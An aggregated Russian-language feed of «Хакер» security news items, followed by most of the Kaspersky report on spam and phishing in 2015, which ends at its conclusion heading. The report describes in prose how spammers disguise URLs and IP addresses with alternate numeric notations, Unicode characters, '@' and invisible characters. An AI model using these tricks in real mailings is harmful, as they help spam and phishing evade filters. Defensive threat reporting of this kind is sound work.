Oralce выпустила внеплановое обновление для Java SE 6, 7 и 8, закрывающее серьезную уязвимость в инсталляторе для Windows (CVE-2016-0603). Не новую, по сути, проблему обнаружил германский исследователь Стефан Кантак (Stefan Kanthak). Уязвимость заключается в том, что инсталлятор может загружать и исполнять DLL-файлы из своей директории, а это, как правило, папка «Downloads».

from «Хакер» http://ift.tt/1RopGCj
via IFTTT

Небезопасная аутентификация. Ищем баги в приложениях с Single Sign-On на базе SAML

Для подписчиков
Перед тобой практическое руководство по аудиту безопасности веб-приложений с поддержкой Single Sign-On — технологии, которая позволяет логиниться в веб-приложение через сторонний сайт. Мы подробно расскажем, какие инструменты нужно использовать для пентестов, на наличие каких уязвимостей нужно проверять приложение: XXE, атаки через преобразования, XPath-инъекции, ошибки при проверке подписи, атаки XSW, атаки на зашифрованные assertions и многое другое. Велком!

from «Хакер» http://ift.tt/1W9OGwh
via IFTTT

За ботнетом Dyre стояла кинокомпания «25 этаж», занятая производством ленты «Ботнет»

Любопытную параллель усмотрели журналисты Reuters, опираясь на данные собственных источников. Оказывается, международная операция по прекращению деятельности банковского трояна Dyre (также известного как Dyreza) странным образом совпала с обысками в офисах московской кинокомпании «25 этаж», которые были проведены в ноябре прошлого года. После этого эксперты отмечают значительное снижение активности Dyre и, фактически, констатируют если не смерть ботнета, то кому.

from «Хакер» http://ift.tt/20ltm8e
via IFTTT

Хакерская атака повлияла на курс доллара

Специалисты Group-IB представили отчет, свидетельствующий о том, что на курсы валют влияют не только геополитические и экономические факторы, но и хакеры. Эксперты пишут, что выявили первый случай, когда атака на брокера привела к изменениям биржевого курса.

from «Хакер» http://ift.tt/1O0Q8eL
via IFTTT

понедельник, 8 февраля 2016 г.

Эксперты раскритиковали браузер SafeZone компании Avast и встроенный браузер Steam

На прошлой неделе сотрудник Google Project Zero Тевис Орманди (Tavis Ormandy) уже подверг жесткой критике защищенный браузер Chromodo, который компания Comodo поставляет вместе со своей антивирусной продукцией. Теперь пришла очередь браузера Avast SafeZone, также известного как Avastium.

from «Хакер» http://ift.tt/1K92yGv
via IFTTT

В продуктах Netgear обнаружили две уязвимости и выпустили для них модули Metasploit

В системе ProSafe Network Management 300, предназначенной для управления, диагностики и оптимизации работы сетевых девайсов, были обнаружены две опасные уязвимости, позволяющие полностью скомпрометировать систему. Оба бага до сих пор не устранены, но информацию о проблемах уже обнародовал CERT. После публикации CERT, нашедший уязвимости исследователь счел возможным выпустить два модуля для Metasploit, а также опубликовать детальные данные.

from «Хакер» http://ift.tt/1UXL28w
via IFTTT

Новое семейство троянов для Android внедряется в системные процессы

Эксперты компании «Доктор Веб» сообщают, что угрозы для мобильных устройств становится все сложнее. Так, недавно специалистами компании был обнаружен набор троянов, которые действуют сообща, за счет чего получают широкий спектр функциональных возможностей.

from «Хакер» http://ift.tt/1T8auKG
via IFTTT

Задачи на собеседованиях, спецвыпуск. Стань богатым Java-программистом!

Для подписчиков
Java-программисты на протяжении нескольких лет остаются самыми востребованными специалистами на рынке IT. Невзирая на все мрачные предсказания, проектов, связанных с Java-технологиями, становится все больше: профессиональные Java-специалисты ценятся по всему миру. Если ты задумываешься о карьере Java-разработчика, то эта статья для тебя! В ней собраны практические советы по подготовке и прохождению собеседования, поиску работы в офисе и удаленно.

from «Хакер» http://ift.tt/1SDHc7f
via IFTTT

Плагин Torrents-Time превратит крупнейшие торрент-трекеры в онлайновые кинотеатры

Браузерный плагин Torrents-Time, похоже, пытается совершить небольшую революцию, перевернув современные представления о торрент-трекерах с ног на голову. За основу плагина взята концепция Popcorn Time, только разработчики предлагают внедрить её в любой современный браузер. Плагин позволяет стримить контент с торрент-трекеров и смотреть фильмы и сериалы прямо в окне браузера. Идея пришлась по душе и администраторам крупнейших трекеров мира. The Pirate Bay уже превратился в крупнейший пиратский кинотеатр, добавив кнопку «Stream It!» ко всем раздачам видео.

from «Хакер» http://ift.tt/1W5oymp
via IFTTT

воскресенье, 7 февраля 2016 г.

Maru OS совмещает Android и Debian и позволяет превращать смартфон в десктоп

Интересное решение, пусть и не уникальное в своем роде, предложили пользователям разработчики Maru OS. Кастомная прошивка совмещает в себе Android 5.1 (Lollipop) и Debian Linux. Это позволяет превратить смартфон в полноценный десктоп, работающий на базе Debian, просто подключив в устройству монитор.

from «Хакер» http://ift.tt/20Qwlb4
via IFTTT

Попытка заменить сенсор Touch ID может «убить» iPhone

Журналисты издания The Guardian и команда проекта iFixit привлекли внимание общественности к интересной проблеме, от которой уже пострадали десятки тысяч iPhone. Оказывается, устройство рискует превратиться в «кирпич», если ремонт гаджета был произведен в неофициальном сервисе, а в ходе починки заменили сканер отпечатков пальцев Touch ID (встроенный в кнопку «Домой») или кабель, которым тот подключается к плате.

from «Хакер» http://ift.tt/1KAoUk7
via IFTTT

пятница, 5 февраля 2016 г.

Камеры видеонаблюдения Motorola оказались не средством защиты, а дырой в безопасности

Исследователи компании Context Information Security решили поискать уязвимости в камерах наружного наблюдения Motorola Focus 73. В итоге эксперты не только обнаружили большие проблемы с безопасностью, но и сумели скомпрометировать работу сервиса Hubble, с которым взаимодействуют устройства.

from «Хакер» http://ift.tt/1TIAVpN
via IFTTT

Firefox OS официально мертва

Еще в декабре 2015 года организации Mozilla объявила о том, что разработка новых устройств на базе Firefox OS будет полностью прекращена. Уже тогда стало ясно, что дела у собственной операционной системы Mozilla идут плохо, и вряд ли ОС ждет какое-то светлое будущее. Вчера, 4 февраля 2016 года, организация официально объявила, что Firefox OS мертва.

from «Хакер» http://ift.tt/1SOs59l
via IFTTT

Kaspersky Security Bulletin. Спам в 2015 году

eye_pr_2015

Цифры года

По данным «Лаборатории Касперского» в 2015 году:

  • Доля спама составила 55,28%, что на 11,48 п.п. меньше, чем в 2014 году.
  • 79% разосланных спам-писем имели размер не более 2 Кб.
  • 15,2% всего мирового спама было разослано из США.
  • Больше всего вредоносных писем (19%) были нацелены на пользователей из Германии.
  • Было зафиксировано 146 692 256 срабатываний системы «Антифишинг».
  • Лидером по количеству срабатывания (атак) среди всех стран мира стала Россия (17,8%)
  • Самый высокий процент уникальных пользователей, атакованных фишерами, — в Японии (21,68 %).
  • 34,33% фишинговых атак были направлены на пользователей сайтов финансовых организаций (банки, платежные системы, онлайн-магазины).

Новые доменные зоны в спаме

В самом начале года мы уже отмечали резкое увеличение количества новых доменов верхнего уровня, используемых в массовых рассылках. Причиной этого стал рост интереса спамеров к программе New gTLD, запущенной еще в 2014 году. Цель программы — предоставить различным сообществам и организациями, в зависимости от рода их деятельности, разнообразные имена доменных зон. Новые возможности для бизнеса, которые несет в себе программа New gTLD, были с воодушевлением приняты интернет-сообществом, и активная регистрация новых доменов быстро набрала оборот.

Однако в новых доменных зонах практически сразу началось масштабное распространение разнообразного спама, киберпреступники массово регистрировали новые домены для осуществления спам-рассылок. И если поначалу в некоторых случаях между тематикой рассылок и названием доменных зон прослеживалась связь, то в течение года данная тенденция не сохранилась и тематика спама в целом не была связана с используемыми доменными именами. Хотя и сейчас встречаются единичные случаи, где эту связь можно увидеть. Например, сайты онлайн-знакомств часто размещаются в зоне .date.

Kaspersky Security Bulletin. Спам в 2015 году

Основной причиной того, что эта тенденция не сохранилась, была стоимость регистрации новых доменов. Злоумышленники стараются выбирать как можно более дешевые варианты, ведь зачастую сайты будут использоваться только один раз в конкретной спамерской рассылке, поэтому принадлежность доменов к определенной сфере деятельности большой роли не играет. Помимо цены доменов, определяющим фактором становятся скидки, которые готовы предоставлять мелкие регистраторы за массовую покупку.

Спамерские методы и трюки: особенности текстовой записи доменных имен

Известно, что спамеры стараются сделать каждое письмо рассылки уникальным, чтобы обойти фильтры массовости и усложнить работу контентным фильтрам. Текст письма довольно просто сделать разным, заменяя символы в словах на похожие из других алфавитов, меняя порядок слов и предложений и т.д. Но всегда остается адрес спамерского сайта, изменить который не так просто, так как пройдя по ссылке, пользователь должен попасть на рекламируемый сайт, иначе в рассылке нет никакого смысла. За прошедшие годы спамеры придумали массу трюков для сокрытия спамерского сайта от антиспам-фильтров: редиректы со взломанных сайтов, генерация уникальных ссылок на сервисах коротких ссылок, использование известных облачных служб в качестве редиректоров и т.д.

В 2015 году спамеры, помимо вышеназванных приемов, уделили особое внимание форме записи доменов и IP-адресов. Подробнее рассмотрим эти трюки на примерах, взятых из различных спамерских писем.

Особенности IP-протокола: разные форматы записи IP

Стандартная, привычная пользователям интернета запись IPv4 – это формат dotted decimal – запись в виде четырёх десятичных чисел значением от 0 до 255, разделённых точками. Но бывают и другие форматы записи, которые браузеры будут интерпретировать корректно. Это двоичная, восьмеричная, шестнадцатеричная записи и формат dword/Undotted Integer — когда каждый байт IP сначала переводится в шестнадцатеричный формат, затем все байты записываются в одно число в том же порядке, как они стояли в IP-адресе, и затем это число переводится в десятичную систему. Важной деталью является то, что все эти форматы можно сочетать, записывая каждую часть IP по-разному, и браузер все равно интерпретирует такую запись корректно.

Именно эти приемы и используют спамеры, записывая одни и те же IP-адреса множеством разных способов, в том числе сочетая разные форматы:

  • oct – hex

Kaspersky Security Bulletin. Спам в 2015 году

  • oct – dword

Kaspersky Security Bulletin. Спам в 2015 году

  • hex – dword

Kaspersky Security Bulletin. Спам в 2015 году

Адреса в шестнадцатеричном формате можно записывать и разделяя числа точками, и без точек:

Kaspersky Security Bulletin. Спам в 2015 году

Кроме того, в формате Integer к числу можно прибавить 4294967296 (256^4) любое количество раз, и результат все равно будет интерпретироваться как тот же самый IP.

В десятеричном формате к каждой части IP-адреса можно прибавлять число 256 один или более раз, но так, чтобы результат оставался трёхзначным – и адрес будет интерпретирован верно.

К IP-адресу в восьмеричном формате можно добавить произвольное количество лидирующих нулей – и он останется корректным:

Kaspersky Security Bulletin. Спам в 2015 году

Также в адрес можно вставить любое число прямых слешей:

Kaspersky Security Bulletin. Спам в 2015 году

Отметим, что хотя в некоторых легальных библиотеках IP-адреса могут храниться в разных форматах, использовать любой другой формат, кроме стандартного dotted decimal в URL (то есть, собственно, в ссылках, о которых и идет речь) запрещено.

Обфускация IP-адреса, или Сколькими способами в Юникоде можно записать одно число

Мы уже неоднократно писали про обфускацию ключевых слов в спаме с использованием различных диапазонов Юникода. Те же трюки применимы и к записи IP-адресов и доменов. Применительно к IP-адресам в 2015 году спамеры часто использовали цифры Юникода из «полноразмерного» диапазона. Как правило, этот диапазон используется для иероглифических языков, чтобы латинские цифры и буквы не выглядели слишком маленькими и узкими по сравнению с иероглифами.

Kaspersky Security Bulletin. Спам в 2015 году

Нам встречались цифры и из других диапазонов: цифры в круге, с нижним подчеркиванием и т.п.:

Kaspersky Security Bulletin. Спам в 2015 году

Обфускация доменов

Как было сказано выше, с доменами такой трюк тоже срабатывает. Причем наборов буквенных символов в Юникоде еще больше, чем числовых. Часто спамеры использовали сразу несколько диапазонов в одной ссылке (меняя их случайным образом от письма к письму, тем самым повышая вариативность внутри одной рассылки).

Чтобы сделать ссылки еще более уникальными, обфусцировался подобным образом не сам спамерский сайт, а сервисы коротких ссылок, на которых в большом количестве генерировались ссылки на основной сайт:

Kaspersky Security Bulletin. Спам в 2015 году

Особенности интерпретации некоторых символов в URL

В URL есть некоторые специальные символы, которые спамеры также используют для зашумления. Прежде всего это символ «@», который вообще-то должен использоваться для авторизации пользователя на сайте. Ссылка вида http://ift.tt/1K2m0F1 будет означать, что пользователь хочет зайти на сайт domain.com, используя определенные логин (login) и пароль (password). Если же сайт не требует авторизации, то все, что идет до символа «@», просто будет игнорироваться. Мы встречали и рассылки, где спамеры просто вставляли значок «@» перед доменом, и рассылки, где до значка «@» шла какая-то случайная (или не случайная) последовательность:

Kaspersky Security Bulletin. Спам в 2015 году

Интересно, что такой прием взяли на вооружение спамеры, хотя вообще традиционно его используют фишеры. Дело в том, что с помощью такой записи злоумышленник может попытаться запутать пользователя, заставив последнего думать, что ссылка ведет на легитимный сайт. Например, в ссылке вида http://ift.tt/20dO9L6 браузер будет отправлять запрос на spamdomain.com, а вовсе не на google.com.

Отметим однако, что для визуального обмана пользователей спамеры использовали другой трюк с доменами: они зарегистрировали массу доменов, начинающихся на «com-«. С доменами третьего уровня ссылки в письмах выглядели, например, вот так:

http://ift.tt/1K2lYg8

Если посмотреть беглым взглядом, можно подумать, что основной домен – learnmore.com, тогда как на самом деле это com-eurekastep.eu.

Помимо символа «@», спамеры замусоривали ссылки и другими символами:

http://ift.tt/20dO9L9

К примеру, в данном случае в домене goo.gl можно заметить фрагмент «&zwj». Он вставлялся случайным образом в разные части имени домена, делая ссылку уникальной в каждом письме. Эта вставка называется Zero-width joiner, она используется, чтобы объединять в один символ некоторые отдельные символы в индуистских языках, а также эмотиконы. Внутри имени домена она очевидно никакой смысловой нагрузки не несет, а просто замусоривает ссылку.

Еще один вариант – зашумление ссылки с помощью «мягкого переноса» (SHY, soft hyphen). В HTML SHY является спецсимволом, который не виден в обычном тексте, но если слово, внутри которого находится спецсимвол, попадает на конец строки, не помещаясь целиком, часть после спецсимвола будет перенесена на следующую строку, а к первой части добавится знак переноса. Как правило, браузеры и почтовые клиенты игнорируют этот символ внутри ссылок, поэтому спамеры могут вставлять его в URL в любом месте и в любом количестве. Нам встречались рассылки, где такой перенос вставлялся в имя домена более 200 раз (в шестнадцатеричной кодировке):

Kaspersky Security Bulletin. Спам в 2015 году

Помимо «мягкого переноса» в имени домена встречаются другие спецсимволы: порядковый индикатор (º) и верхние индексы 1 и 2 (¹, ²) – которые могут интерпретироваться некоторыми браузерами как буква «o» и цифры «1» и «2» соответственно.

Многократное повторение известного домена

Еще один оригинальный способ замусоривания ссылки, встречавшийся нам в разных спам-рассылках 2015 года, это использование какого-то известного домена в качестве редиректора. Сам способ не нов, но на этот раз спамеры добавляли один и тот же известный домен несколько раз:

Kaspersky Security Bulletin. Спам в 2015 году

Письма без URL

Отдельно стоит упомянуть случаи, где имен доменов как таковых в письмах просто не было. Так, в некоторых рассылках вместо URL встречался QR-код.

Kaspersky Security Bulletin. Спам в 2015 году

Kaspersky Security Bulletin. Спам в 2015 году

А в других рассылках пользователю предлагалось ввести последовательность случайного вида в поисковик, ссылка на сайт появлялась вверху поисковой выдачи:

Kaspersky Security Bulletin. Спам в 2015 году

Мировые события в спаме

Олимпиада в Бразилии пройдет только в 2016 году, однако уже в 2015 мошенники рассылали фальшивые уведомления о выигрыше в лотерею, посвященную популярному спортивному событию. Письма содержали PDF-вложения, в которых получателю сообщали, что его адрес был случайным образом выбран из миллионов электронных адресов. Для получения выигрыша необходимо было ответить на письмо и предоставить указанную персональную информацию. Во вложениях содержался не только текст, но и различные графические элементы (логотипы, фотографии и т.п.). Отметим, что мошеннические уведомления о выигрыше в лотерею, текст которых достаточно большой, часто рассылаются именно с вложениями – для обхода спам-фильтров.

Kaspersky Security Bulletin. Спам в 2015 году

В 2015 году «Нигерийские» мошенники в качестве тем использовали политические события на Украине, войну в Сирии, выборы президента Нигерии и землетрясение в Непале. Авторы писем в основном просили помочь инвестировать имеющиеся у них крупные суммы денег или оказать финансовую помощь. Для обмана получателей и выманивания у них денежных средств мошенники использовали традиционные для «нигерийских» писем уловки.

Kaspersky Security Bulletin. Спам в 2015 году

Письма про войну в Сирии часто рассказывали про беженцев и граждан Сирии, ищущих убежища в европейских странах. В некоторых письмах говорилось о том, что они отправлены прямо из лагеря беженцев, и содержались жалобы на плохие условия.

Статистика

Доля спама в почтовом трафике

Доля спама в почтовом трафике в 2015 году снизилась на 11,48 п.п. и составила 55,28%.

Kaspersky Security Bulletin. Спам в 2015 году

Доля спама в мировом почтовом трафике, 2015 г.

Наиболее значительным был спад в первые месяцы 2015 года – с 61,86% в январе до 53,63% в апреле. Далее доля спама изменялась незначительно, в пределах 1-2 п.п.

Страны – источники спама

Kaspersky Security Bulletin. Спам в 2015 году

Страны – источники спама в мире, 2015 год

В 2015 году в первой тройке стран – источников спама произошли небольшие изменения: Китай (6,12%) переместился на четвертое место, несмотря на то что его доля выросла на 0,59 п.п. Вместо него третью позицию занял Вьетнам (6,13%), прибавивший 1,92 п.п. На втором месте по-прежнему Россия (6,15%), чья доля также увеличилась – на 0,22 п.п. А вот доля США (15,16%) – наоборот, сократилась на 1,5 п.п., но страна по-прежнему лидирует с большим отрывом.

Пятое место, как и в 2014 году, занимает Германия (4,24%, +0,24 п.п.) Далее следуют Украина (3,99%, +0,99 п.п.), Франция (3,17%, +0,62 п.п.), Индия (2,96%, без изменения процента), и Аргентина (2,90%, -0,65 п.п.) Замыкает первую десятку Бразилия (2,85%, +0,42 п.п.).

Размеры спамовых писем

Kaspersky Security Bulletin. Спам в 2015 году

Размер спамовых писем, 2015 год

В 2015 году доля очень маленьких писем (до 2 Кб) в спаме выросла еще немного и составила в среднем 79,13%. Доля писем размером от 2 до 5 Кб, наоборот, уменьшилась до 9,08%. В целом в 2015 году в спаме сохранилась тенденция к уменьшению размера письма.

Вредоносные вложения в почте

Kaspersky Security Bulletin. Спам в 2015 году

TOP 10 вредоносных программ, распространенных в почте, 2015 г.

В итоговом годовом рейтинге наиболее распространённых в почте зловредов первое место занял бессменный Trojan-Spy.HTML.Fraud.gen из семейства троянских программ, реализованных в виде поддельных HTML-страниц. Зловред рассылается по электронной почте под видом важного сообщения от крупных коммерческих банков, интернет-магазинов, софтверных компаний и т.д. На предложенной поддельной HTML-странице пользователь вводит свои конфиденциальные данные, после чего введённая информация отправляется киберпреступникам.

На второй строке находится Trojan-Downloader.HTML.Agent.aax, а на девятой и десятой — Trojan-Downloader.HTML.Meta.as и Trojan-Downloader.HTML.Meta.ay соответственно. Эти зловреды представляют собой HTML-страницы с кодом для переадресации пользователя на вредоносный сайт. Там жертву обычно ждет фишинговая страничка или предложение скачать программу для работы с сервисом автоматической торговли бинарными опционами. Распространяются зловреды через почтовые вложения и различаются только ссылкой, перенаправляющей пользователя на сайт злоумышленников.

Загрузчик Trojan-Banker.Win32.ChePro.ink расположился на третьей строке. Зловред выполнен в виде CPL-апплета (компонент панели управления) и занимается загрузкой троянцев, предназначенных для кражи конфиденциальной финансовой информации. В основном зловреды этого типа нацелены на клиентов бразильских и португальских банков.

На четвёртой позиции находится Email-Worm.Win32.Mydoom.l — сетевой червь с функциональностью бэкдора. Распространяется зловред в виде вложений в электронные письма, через файлообменные сети и открытые на запись сетевые ресурсы. Адреса для рассылки писем червь собирает на зараженном компьютере. Для отправки письма червь осуществляет прямое подключение к SMTP-серверу получателя.

Далее расположились Trojan.JS.Agent.csz и Trojan-Downloader.JS.Agent.hhi, которые представляют собой загрузчики, написанные на JavaScript. Эти зловреды могут содержать несколько адресов (доменов), к которым последовательно обращается заражённый компьютер. Если обращение проходит успешно, в папку temp скачивается и запускается вредоносный EXE-файл.

Восьмую строку занимает Trojan-PSW.Win32.Fareit.auqm. Зловреды семейства Fareit крадут cookies браузеров, пароли от FTP-клиентов и почтовых программ, а затем отсылают эти данные на удаленный сервер злоумышленников.

Семейства вредоносных программ

На протяжении всего года лидером оставалось семейство Upatre. Чаще всего зловреды этого семейства загружают на компьютеры-жертвы троянца-банкера, известного как Dyre/Dyzap/Dyreza.

Вторую и третью позиции по итогам года занимают MSWord.Agent и VBS.Agent. Напомним, что зловреды семейства MSWord.Agent представляют собой DOC-файл со встроенным макросом, написанным на Visual Basic for Applications (VBA), который выполняется при открытии документа. Зловред загружает и запускает другое вредоносное ПО, например одного из представителей семейства бэкдоров Andromeda.VBS.Agent, который, как следует из названия, использует встроенный VBS-скрипт. Для загрузки и запуска различного вредоносного ПО на компьютере пользователя зловреды семейства используют технологию ADODB.Stream.

На четвёртой позиции — семейство Andromeda. Эти зловреды позволяют злоумышленникам незаметно управлять зараженными компьютерами, которые часто становятся частью ботнета. Отметим, что по итогам 2014 года семейство Andromeda занимало первое место.

Пятую позицию по итогам года занимает семейство Zbot. Представители этого семейства предназначены для атаки на серверы и пользовательские компьютеры, а также для перехвата данных. Хотя ZeuS/Zbot способен выполнять различные вредоносные действия, чаще всего он используется для кражи банковской информации.

Страны — мишени вредоносных рассылок

Kaspersky Security Bulletin. Спам в 2015 году

Распределение срабатываний почтового антивируса по странам, 2015 г.

Если по итогам предыдущих трёх лет тройка лидеров оставалась неизменной (это были США, Великобритания и Германия), то в 2015 году спамеры сменили свою тактику и мишени. В результате по итогам года на первую позицию вышла Германия (19,06%, +9,84 п.п.). На второй позиции оказалась Бразилия, которая по итогам 2014 года занимала лишь 6-е место (7,64%, +4,09 п.п.).

Самым большим сюрпризом третьего квартала и всего 2015 года стало то, что Россия оказалась на третьем месте среди стран, на территорию которых рассылаются вредоносные программы (6,30%, +3,06 п.п.). Напомним, что по итогам 2014 года Россия занимала лишь восьмое место, а на территорию страны рассылалось при этом не больше 3,24% всего вредоносного спама.

Хочется верить, что несмотря на тенденцию последних кварталов, количество вредоносных рассылок рассылаемых на территорию России пойдёт на убыль. Если говорить об общем количестве вредоносных вложений, рассылаемых через почту, то в 2016 году их число будет только расти, а на первые места будут выходить кража персональной информации и троянцы-вымогатели.

Особенности вредоносного спама

В 2015 году во вредоносном спаме был зафиксирован всплеск рассылок с макровирусами. В первом квартале мы зафиксировали наибольшее количество писем с макровирусами, которые рассылались во вложениях с расширением .doc или .xls и принадлежали к категории троянцев-загрузчиков, которые в свою очередь скачивали другое вредоносное ПО.

В основном вложения маскировались под различные финансовые документы: извещения о штрафе, денежном переводе, неоплаченном счете, платеже, а также жалобы, электронные билеты, заказы. Часто они были отправлены от имени сотрудников реально существующих организаций и компаний.

Опасность макровирусов не ограничивается их доступностью и простотой создания. Макровирус способен заражать не только изначально открытый документ, но и глобальный макрос, общий для всех подобных документов, а следовательно, и все документы пользователя, которые обращаются к глобальному макросу. Кроме того, не стоит забывать, что язык VBA достаточно функционален для написания самого разнообразного вредоносного кода.

Kaspersky Security Bulletin. Спам в 2015 году

В 2015 году преступники, специализирующиеся на вредоносном спаме, продолжили рассылать вредоносные программы в архивах нетрадиционных форматов (.cab, .ace, .7z, .z, .gz). Все эти форматы архивирования созданы достаточно давно и используются специалистами в области разработки и установки ПО, но в основном неизвестны обычным пользователям, в отличие от архивов ZIP и RAR. Особенностью этих архивов является высокая степень сжатия файлов, упакованных в данные архивы, что используется для уменьшения размера писем и обхода спам-фильтров. Такие вредоносные архивы выдавались за самые разнообразные вложения (заказы, счета, фотографии, сообщения и др.) и содержали различные зловреды (Trojan-Downloader.Win32.Cabby, Trojan-Downloader.VBS.Agent.azx, Trojan-Spy.Win32.Zbot.iuk, кейлоггер HawkEye Keylogger и др.). Подавляющее большинство писем было написано на английском языке, однако встречались примеры и на других языках.

Kaspersky Security Bulletin. Спам в 2015 году

В прошлом году киберпреступники активно рассылали подделки под письма с мобильных устройств и нотификации от мобильных приложений, содержащие зловреды и рекламные сообщения. В 2015 году мобильная тема получила продолжение: зловреды рассылались в виде файлов .apk и .jar, являющихся архивными исполняемыми файлами-приложениями для мобильных устройств. Файлы с расширением .jar – это обычные ZIP-архивы, в которых содержится программа на языке Java, и предназначены они преимущественно для запуска с мобильного телефона; файлы .apk используются для установки приложений в ОС Android.

В частности, злоумышленники маскировали мобильного троянца-шифровальщика SLocker под файл с обновлениями программы Flash Player. Зловред шифровал содержащиеся на Android-устройстве файлы (изображения, видеофайлы и различные документы). После запуска шифровальщика пользователю показывалось сообщение с требованием заплатить некоторую сумму за расшифровку. В другом примере в архиве .jar был обнаружен Backdoor.Adwind, написанный на языке Java. Главное преимущество данного зловреда — это мультиплатформенность, то есть его можно установить не только на различные мобильные устройства, но и на ОС Windows, Mac и Linux.

Скорее всего, злоумышленники, рассылающие вредоносное ПО в виде файлов, предназначенных для мобильных устройств, рассчитывали на то, что пользователи, работающие с электронной почтой с мобильных устройств, установят вредоносную программу, вложенную в полученное письмо.

Отметим, что с каждым годом мобильные устройства все чаще попадают в фокус внимания киберпреступников. Во-первых, это связано с постоянным увеличением активности мобильных пользователей (использованием мессенджеров и других средств обмена данными) и переходом различных услуг (например, финансовых операций) на мобильные платформы, причем один пользователь может иметь сразу несколько мобильных устройств. Во-вторых, появление различных приложений, которые востребованы пользователями и в то же время могут быть использованы мошенниками как напрямую (для рассылок спама, в том числе вредоносного), так и косвенно (в тематике фишинговых писем). Например, пользователи популярного мессенджера WhatsApp становятся жертвами не только традиционного рекламного спама, но и вирусописателей. Пользователям мобильных устройств необходимо быть предельно внимательными, так как активность злоумышленников в этой области будет только расти.

Kaspersky Security Bulletin. Спам в 2015 году

Фишинг

Основные тенденции

В 2015 году на компьютерах пользователей продуктов «Лаборатории Касперского» было зафиксировано 148 395 446 срабатываний системы «Антифишинг». Из них 60% (89 947 439) – срабатывания детерминистических компонентов, и 40% (58 448 007) – срабатывания эвристического веб-компонента.

Способы распространения фишингового контента

Распространение фишингового контента давно вышло за рамки почтовых клиентов. Например, один из популярных способов распространения фишинговых страниц – это всплывающая реклама. В 2015 году мы столкнулись с множеством мошеннических схем, использующих этот нехитрый прием: поддельные страницы автоматически открываются в браузере при посещении некоторых сайтов, в том числе вполне легитимных, но использующих всплывающие окна для рекламы.

Используя данный прием, мошенники атаковали пользователей российских банков на протяжении третьего и четвертого кварталов.

Kaspersky Security Bulletin. Спам в 2015 году

Пример мошеннической страницы, на которую жертва попадает посредством всплывающей рекламы.

Другие популярные темы года

Как мы уже отмечали в первом квартале, доля категории «Логистические компании» довольно мала (0,23%), однако она показала небольшой рост в этом году (+0,04 п.п.), а компания DHL из этой категории стабильно входит в TOP 100 атакуемых фишерами организаций.

Такое прикрытие – письмо от имени логистической компании – мошенники используют для рассылки вредоносных вложений, получения персональных данных, а также денежных средств.

Kaspersky Security Bulletin. Спам в 2015 году

Пример фишингового письма, имитирующего сообщение от компании FedEx

Особую активность в этой категории мошенники проявляют накануне праздников, когда множество людей покупает подарки себе и близким, используя популярные сервисы доставки.

Уловки в почте

При проведении фишинговых атак мошенники давно и успешно используют вложенные в письма PDF-файлы. Чаще всего данные файлы представляют собой форму для ввода персональной информации, которая отправляется мошенникам при нажатии на размещенную в этой форме кнопку. Однако в 2015 году мы заметили увеличение количества писем, в которых во вложенный PDF-документ помещались текст сообщения и ссылка на фишинговую страницу. В самом же теле письма текст был сведен к минимуму с целью обхода спам-фильтров.

Такие уловки встречаются в атаках на клиентов организаций всех категорий. Множество подобных атак в 2015 году было отмечено на клиентов банковских и почтовых организаций.

Kaspersky Security Bulletin. Спам в 2015 году

Пример фишингового письма. В письмо вложен PDF-файл, содержащий ссылку на фишинговую страницу. В теле письма содержится только текст, имитирующий заголовок сообщения, ответом на которое якобы является само письмо.

Также мы обнаружили множество PDF-файлов с переадресацией на фишинговые ресурсы по клику. В основном для этого мошенники предлагали пользователю кликнуть, чтобы просмотреть файл.

Kaspersky Security Bulletin. Спам в 2015 году

Пример фишингового письма. Во вложении PDF-файл, с переадресацией на фишинговый ресурс по клику

География атак

TOP 10 стран по доле атакованных пользователей

Лидером по проценту атакованных уникальных пользователей от общего количества пользователей в стране стала Япония (21,68%), чей показатель увеличился на 2,17 п.п.

Kaspersky Security Bulletin. Спам в 2015 году

Процент пользователей, на компьютерах которых сработала система «Антифишинг», от всех пользователей продуктов «Лаборатории Касперского» в стране, 2015 год

TOP 10 стран по доле атакованных пользователей

Япония 21,68%
Бразилия 21,63%
Индия 21,02%
Эквадор 20,03%
Мозамбик 18,30%
Россия 17,88%
Австралия 17,68%
Вьетнам 17,37%
Канада 17,34%
Франция 17,11%

Лидер прошлого года, Бразилия, переместилась на второе место (21,63%, -5.77 п.п.), далее следуют Индия (21,02%, -2.06 п.п.) и Эквадор (20,03%, -2.79 п.п.).

Распределение атак по странам

По количеству срабатываний системы «Антифишинг» (от общего числа срабатываний нашего продукта по всему миру за год) среди всех стран лидирует Россия (17,8%), чей показатель за год увеличился на 0,62 п.п.

Kaspersky Security Bulletin. Спам в 2015 году

Распределение фишинговых атак по странам, 2015 год

За Россией по количеству срабатываний на территории страны следуют: Бразилия (8,74%, +1,71 п.п.), Индия (7,73%, +0,58 п.п.), США (7,52%, +0,32 п.п). Замыкает первую пятерку Италия (7,04%, +1,47 п.п.).

Организации — мишени атак

Рейтинг категорий атакованных фишерами организаций основывается на срабатываниях эвристического компонента системы «Антифишинг» на компьютерах пользователей. Этот компонент детектирует все страницы с фишинговым контентом, на которые пользователь пытался пройти по ссылкам в письме или в интернете, в тех случаях, когда ссылки на эти страницы еще отсутствуют в базах «Лаборатории Касперского».

Kaspersky Security Bulletin. Спам в 2015 году

Распределение организаций, атакованных фишерами, по категориям, 2015 год

В 2015 году мы отмечаем ощутимый рост доли срабатываний в категории «Финансовые организации» (34,33%, +5,59 п.п), которая объединяет в себе «Банки», «Платежные системы» и «Онлайн-магазины». Также стоит отметить увеличение доли организаций из категорий «Телефонные и интернет-провайдеры» (5,50%, +1,4 п.п.) и «Социальные сети и блоги» (16,40%, +0,63 п.п.).

TOP 3 атакуемых фишерами организаций

Организация % фишинговых ссылок
1 Yahoo! 14,17
2 Facebook 9,51
3 Google 6,8

В ТОР 3 атакуемых фишерами организаций первое место по-прежнему занимает Yahoo! Однако доля фишинговых атак на эту организацию значительно уменьшилась – 14,17% против 23,3% в 2014 году. Как мы предполагаем, этому способствовала активная борьба организации с поддельными доменами. Мы заметили, что Yahoo!, как и многие другие организации, регистрируют на свое имя множество доменов, которые теоретически могли бы быть использованы злоумышленниками, так как их имена являются производными от оригинального доменного имени.

Заключение и прогнозы

